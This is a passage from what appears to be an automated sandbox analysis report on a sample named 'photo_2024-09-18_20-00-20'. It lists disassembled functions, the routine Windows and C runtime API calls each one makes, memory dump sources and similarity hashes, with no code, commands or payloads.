                                                                • Opcode Fuzzy Hash: 56babde01ab4d96fff189b41497c508f4dc93bbf3c9435e73c0b35722ccf642a
                                                                • Instruction Fuzzy Hash: 3651E830E01214DFCB20BFAA884469FB771EF41324F248E2BE926562D1D7B8DE51DB59
                                                                Function 00450A90 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 00450AF2
                                                                • __CxxThrowException@8.LIBCMT ref: 00450B07
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 4063778783-0
                                                                • Opcode ID: 3cb2e9bab876274248a4d950c34430a64cf0889928b1e2a9c312dc628e445c12
                                                                • Instruction ID: 5ee3d8f56faeb684256b16c99153c0e89f8547410f6c1c2324e901c2e01bf5a5
                                                                • Opcode Fuzzy Hash: 3cb2e9bab876274248a4d950c34430a64cf0889928b1e2a9c312dc628e445c12
                                                                • Instruction Fuzzy Hash: BD41DFB59002159FDB14EF98C880A9AFBB5FF05304F04846AEC189B712DB70F954CBE5
                                                                Function 0041E6F1 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetBkMode.GDI32(?,00000001), ref: 0041E715
                                                                • SetTextColor.GDI32(?,?), ref: 0041E73D
                                                                • SelectObject.GDI32(?,00000000), ref: 0041E74F
                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0041E79D
                                                                • SelectObject.GDI32(?,?), ref: 0041E7A9
                                                                  • Part of subcall function 0041B1CF: GetModuleHandleW.KERNEL32(msimg32.dll,AlphaBlend,?,?,?,?,?,?,?,0041E78E,?,?,00000000,?,?), ref: 0041B1F2
                                                                  • Part of subcall function 0041B1CF: GetProcAddress.KERNEL32(00000000), ref: 0041B1F9
                                                                  • Part of subcall function 0041B1CF: CreateCompatibleDC.GDI32(?), ref: 0041B234
                                                                  • Part of subcall function 0041B1CF: SelectObject.GDI32(00000000,00000000), ref: 0041B244
                                                                  • Part of subcall function 0041B1CF: GetObjectW.GDI32(00000000,00000018,?), ref: 0041B258
                                                                  • Part of subcall function 0041B1CF: SelectObject.GDI32(00000000,00000000), ref: 0041B2D9
                                                                  • Part of subcall function 0041B1CF: DeleteObject.GDI32(00000000), ref: 0041B2DC
                                                                  • Part of subcall function 0041B1CF: DeleteDC.GDI32(00000000), ref: 0041B2E3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Object$Select$DeleteText$AddressColorCompatibleCreateDrawHandleModeModuleProc
                                                                • String ID:
                                                                • API String ID: 4023113614-0
                                                                • Opcode ID: d8f77088fc53de1eee693bfc592a9832d425164d78ac86b8811ab11464dc5d9a
                                                                • Instruction ID: 5ddb10f791090fc89ee9e2713be884d7fc54c56aafa649594628ff0bbfd37052
                                                                • Opcode Fuzzy Hash: d8f77088fc53de1eee693bfc592a9832d425164d78ac86b8811ab11464dc5d9a
                                                                • Instruction Fuzzy Hash: B821DC75100108BFEF01AF15CC89AFF3BB9EB86350F000009FC1696290C7799C92ABB0
                                                                Function 024837AA Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _malloc.LIBCMT ref: 024837B8
                                                                  • Part of subcall function 0247AC8F: __FF_MSGBANNER.LIBCMT ref: 0247ACA8
                                                                  • Part of subcall function 0247AC8F: __NMSG_WRITE.LIBCMT ref: 0247ACAF
                                                                  • Part of subcall function 0247AC8F: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0247ACD4
                                                                • _free.LIBCMT ref: 024837CB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap_free_malloc
                                                                • String ID:
                                                                • API String ID: 1020059152-0
                                                                • Opcode ID: 1f3c63e558aea20b4c28641bacc853b5210cbff066ff51f945ec9c065e97be1c
                                                                • Instruction ID: ba446488e5a8a8fa317deaff947217f76bcda3151696850c24164ac802ec508a
                                                                • Opcode Fuzzy Hash: 1f3c63e558aea20b4c28641bacc853b5210cbff066ff51f945ec9c065e97be1c
                                                                • Instruction Fuzzy Hash: 7411EB72920720EBDB217F759C0479E3FEAAF44B74F20856BF4599A250DB34C442CAD0
                                                                Function 0048EEEA Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _malloc.LIBCMT ref: 0048EEF8
                                                                  • Part of subcall function 0048DDE5: __FF_MSGBANNER.LIBCMT ref: 0048DDFE
                                                                  • Part of subcall function 0048DDE5: __NMSG_WRITE.LIBCMT ref: 0048DE05
                                                                  • Part of subcall function 0048DDE5: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,0048A397,?), ref: 0048DE2A
                                                                • _free.LIBCMT ref: 0048EF0B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap_free_malloc
                                                                • String ID:
                                                                • API String ID: 1020059152-0
                                                                • Opcode ID: 4ff77e20bdba10bd3eb34b67370b71cbe2fedf8bc7884682f5c72d04990161c7
                                                                • Instruction ID: 5b988cc10a506bfd32ba06cea4a1dee7fbf3e4205a1b1ed11b931b090c8f21e9
                                                                • Opcode Fuzzy Hash: 4ff77e20bdba10bd3eb34b67370b71cbe2fedf8bc7884682f5c72d04990161c7
                                                                • Instruction Fuzzy Hash: F011E732805614BBCF223F72AC04A5E3BA59F54375B214C2BFB099A291DB3CC841D79D
                                                                Function 00412855 Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00412872
                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00412891
                                                                • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 004128B2
                                                                • SetWindowLongW.USER32(?,000000EB,00000000), ref: 004128C2
                                                                • DefWindowProcW.USER32(?,00000081,?,?), ref: 004128EE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Window$Long$Proc$Call
                                                                • String ID:
                                                                • API String ID: 1819824282-0
                                                                • Opcode ID: 1022ab95811635ba4afb465e612f30329facb78198e8a3c6ee423559e39dab06
                                                                • Instruction ID: 6b2b75a3fda6aaf0882710378cdb0c1b53af111aee62cc4481c1080a8e1406d6
                                                                • Opcode Fuzzy Hash: 1022ab95811635ba4afb465e612f30329facb78198e8a3c6ee423559e39dab06
                                                                • Instruction Fuzzy Hash: 55219D31100205AFCF21AF45DD08EAB7BB4FF45720F00861AF956A2260C7B49860EF61
                                                                Function 00480CA0 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00480CB0
                                                                  • Part of subcall function 0048B2D8: HeapFree.KERNEL32(00000000,00000000,?,00496A44,00000000,?,0048DC95,0048DE6E), ref: 0048B2EE
                                                                  • Part of subcall function 0048B2D8: GetLastError.KERNEL32(00000000,?,00496A44,00000000,?,0048DC95,0048DE6E), ref: 0048B300
                                                                • std::exception::exception.LIBCMT ref: 00480CD6
                                                                • __CxxThrowException@8.LIBCMT ref: 00480CEB
                                                                • _malloc.LIBCMT ref: 00480D04
                                                                • _memmove.LIBCMT ref: 00480D1E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ErrorException@8FreeHeapLastThrow_free_malloc_memmovestd::exception::exception
                                                                • String ID:
                                                                • API String ID: 3800161811-0
                                                                • Opcode ID: 08c448c028fbea5a880cac0324943b267c4841efd808369fdcedfe7b6aa7d087
                                                                • Instruction ID: 72513dbac00e2f994e72817218af35a5cf6dd35814324be061dea1c59023b0ac
                                                                • Opcode Fuzzy Hash: 08c448c028fbea5a880cac0324943b267c4841efd808369fdcedfe7b6aa7d087
                                                                • Instruction Fuzzy Hash: C5110A714002096BCB11FF59C8849EFBBA8AF46354B144A6BEC055B301D775DA09C7EA
                                                                Function 00449440 Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00449451
                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 0044947D
                                                                • GetLastError.KERNEL32(?,?,?), ref: 00449487
                                                                • CloseHandle.KERNEL32(?,?,?,?), ref: 004494B4
                                                                • CloseHandle.KERNEL32(?,?,?,?), ref: 004494BA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle$CreateErrorLastProcess_memset
                                                                • String ID:
                                                                • API String ID: 1393943095-0
                                                                • Opcode ID: 5d51ed6641cbf36d606bd9a41fc5706de632dd8bc30941551e0f55363726ffac
                                                                • Instruction ID: 38471d9ba72c14fbf604d8e13e76ca3abd033c90a75ebe7ee68d5905418822f9
                                                                • Opcode Fuzzy Hash: 5d51ed6641cbf36d606bd9a41fc5706de632dd8bc30941551e0f55363726ffac
                                                                • Instruction Fuzzy Hash: 88110CB5E04218AFCB10DFE9D844A9FBBF8EF48710F00855AE919E7700E635A9008B90
                                                                Function 0247A341 Relevance: 7.6, APIs: 5, Instructions: 58memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,02472558,00000001,00000000,00000000,?,?,024716AA,?,00000004,02472558), ref: 0247A36F
                                                                • _free.LIBCMT ref: 0247A382
                                                                • GetLastError.KERNEL32(?,?,024716AA,?,00000004,02472558), ref: 0247A38A
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0247A3A5
                                                                • _free.LIBCMT ref: 0247A3B6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _free$AllocByteCharErrorLastMultiStringWide
                                                                • String ID:
                                                                • API String ID: 3133011222-0
                                                                • Opcode ID: 11a14af71066cc8687534cd4ab35bbeb566fd449b8ac4771a5ba10d86d9b9092
                                                                • Instruction ID: 1dc16b2ece963e965dff737c21277b91e19379ab8e379bf1e0252ad5c8d768d7
                                                                • Opcode Fuzzy Hash: 11a14af71066cc8687534cd4ab35bbeb566fd449b8ac4771a5ba10d86d9b9092
                                                                • Instruction Fuzzy Hash: 1211E972D00225AFEB10AFA58C85BDFB775FF48364F10413EF92AB7290DAB9D4508A51
                                                                Function 1000A33D Relevance: 7.6, APIs: 5, Instructions: 58memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,?,100016A6,?,00000004,10002554), ref: 1000A36B
                                                                • _free.LIBCMT ref: 1000A37E
                                                                • GetLastError.KERNEL32(?,?,100016A6,?,00000004,10002554), ref: 1000A386
                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000A3A1
                                                                • _free.LIBCMT ref: 1000A3B2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _free$AllocByteCharErrorLastMultiStringWide
                                                                • String ID:
                                                                • API String ID: 3133011222-0
                                                                • Opcode ID: 0dd2840041f3a11d76727191bdc98b081ffb92faf3080d35796c4e9f6b9a87e4
                                                                • Instruction ID: 2077ca9f4d592fb9d393f88bccc68470f0d953868ed846a2b40838c90a075a67
                                                                • Opcode Fuzzy Hash: 0dd2840041f3a11d76727191bdc98b081ffb92faf3080d35796c4e9f6b9a87e4
                                                                • Instruction Fuzzy Hash: 1311C676E00205ABF714DB648C86B9EB764FF4A2E1F114339FD0AB3245EA35F9C08651
                                                                Function 0046B870 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InitializeCriticalSection.KERNEL32(0045CAEA,0045C98E,00000000,0046A00D,?,?,?,759113C0), ref: 0046B87E
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,759113C0), ref: 0046B8EB
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,759113C0), ref: 0046B8F7
                                                                • _memset.LIBCMT ref: 0046B909
                                                                • _memset.LIBCMT ref: 0046B915
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CreateEvent_memset$CriticalInitializeSection
                                                                • String ID:
                                                                • API String ID: 1432036746-0
                                                                • Opcode ID: f7975e7a69803b6bd0cccdbbb10edb9ee1464cd690233cebf00886fb6948119f
                                                                • Instruction ID: 9c38cbf8100d8e271c47269ec5bdd63dd3dad25e750fada5a7f6901e6b4d262c
                                                                • Opcode Fuzzy Hash: f7975e7a69803b6bd0cccdbbb10edb9ee1464cd690233cebf00886fb6948119f
                                                                • Instruction Fuzzy Hash: 1121A2B0800B059FD360DF6AC9C0B57FAE8FB08344F90892EE59E82A10E374A8048F60
                                                                Function 024805E2 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __CreateFrameInfo.LIBCMT ref: 0248060A
                                                                  • Part of subcall function 0247C1DF: __getptd.LIBCMT ref: 0247C1ED
                                                                  • Part of subcall function 0247C1DF: __getptd.LIBCMT ref: 0247C1FB
                                                                • __getptd.LIBCMT ref: 02480614
                                                                  • Part of subcall function 0247E1CD: __getptd_noexit.LIBCMT ref: 0247E1D0
                                                                  • Part of subcall function 0247E1CD: __amsg_exit.LIBCMT ref: 0247E1DD
                                                                • __getptd.LIBCMT ref: 02480622
                                                                • __getptd.LIBCMT ref: 02480630
                                                                • __getptd.LIBCMT ref: 0248063B
                                                                  • Part of subcall function 0247C284: __CallSettingFrame@12.LIBCMT ref: 0247C2D0
                                                                  • Part of subcall function 02480708: __getptd.LIBCMT ref: 02480717
                                                                  • Part of subcall function 02480708: __getptd.LIBCMT ref: 02480725
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                • String ID:
                                                                • API String ID: 3282538202-0
                                                                • Opcode ID: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
                                                                • Instruction ID: e155b04b445c421140f9a37eefbd2f0ac82df458228209dce7c164752855609d
                                                                • Opcode Fuzzy Hash: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
                                                                • Instruction Fuzzy Hash: 4C11E6B5D10209DFDF01EFA5C845AEDBBB2FF08314F1085AAE824AB250DB389A559F50
                                                                Function 100105DE Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __CreateFrameInfo.LIBCMT ref: 10010606
                                                                  • Part of subcall function 1000C1DB: __getptd.LIBCMT ref: 1000C1E9
                                                                  • Part of subcall function 1000C1DB: __getptd.LIBCMT ref: 1000C1F7
                                                                • __getptd.LIBCMT ref: 10010610
                                                                  • Part of subcall function 1000E1C9: __getptd_noexit.LIBCMT ref: 1000E1CC
                                                                  • Part of subcall function 1000E1C9: __amsg_exit.LIBCMT ref: 1000E1D9
                                                                • __getptd.LIBCMT ref: 1001061E
                                                                • __getptd.LIBCMT ref: 1001062C
                                                                • __getptd.LIBCMT ref: 10010637
                                                                  • Part of subcall function 1000C280: __CallSettingFrame@12.LIBCMT ref: 1000C2CC
                                                                  • Part of subcall function 10010704: __getptd.LIBCMT ref: 10010713
                                                                  • Part of subcall function 10010704: __getptd.LIBCMT ref: 10010721
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                • String ID:
                                                                • API String ID: 3282538202-0
                                                                • Opcode ID: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
                                                                • Instruction ID: a34a26c94cea6deafa8c9f36bd2a728e31c5b09b861303a45c5e6187363f670b
                                                                • Opcode Fuzzy Hash: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
                                                                • Instruction Fuzzy Hash: 661119B5D00249DFEF00DFA4D845AED7BB0FF08314F10846AF814AB256DB38AA559F50
                                                                Function 0041624C Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _vswprintf_s.LIBCMT ref: 00416262
                                                                • _malloc.LIBCMT ref: 0041626E
                                                                  • Part of subcall function 0048DDE5: __FF_MSGBANNER.LIBCMT ref: 0048DDFE
                                                                  • Part of subcall function 0048DDE5: __NMSG_WRITE.LIBCMT ref: 0048DE05
                                                                  • Part of subcall function 0048DDE5: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,0048A397,?), ref: 0048DE2A
                                                                • _memset.LIBCMT ref: 00416279
                                                                • _vswprintf_s.LIBCMT ref: 00416288
                                                                  • Part of subcall function 00415F2F: _wcslen.LIBCMT ref: 00415F4A
                                                                  • Part of subcall function 00415F2F: _free.LIBCMT ref: 00415F64
                                                                  • Part of subcall function 00415F2F: _wcsncpy.LIBCMT ref: 00415FA0
                                                                • _free.LIBCMT ref: 0041629F
                                                                  • Part of subcall function 0048B2D8: HeapFree.KERNEL32(00000000,00000000,?,00496A44,00000000,?,0048DC95,0048DE6E), ref: 0048B2EE
                                                                  • Part of subcall function 0048B2D8: GetLastError.KERNEL32(00000000,?,00496A44,00000000,?,0048DC95,0048DE6E), ref: 0048B300
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
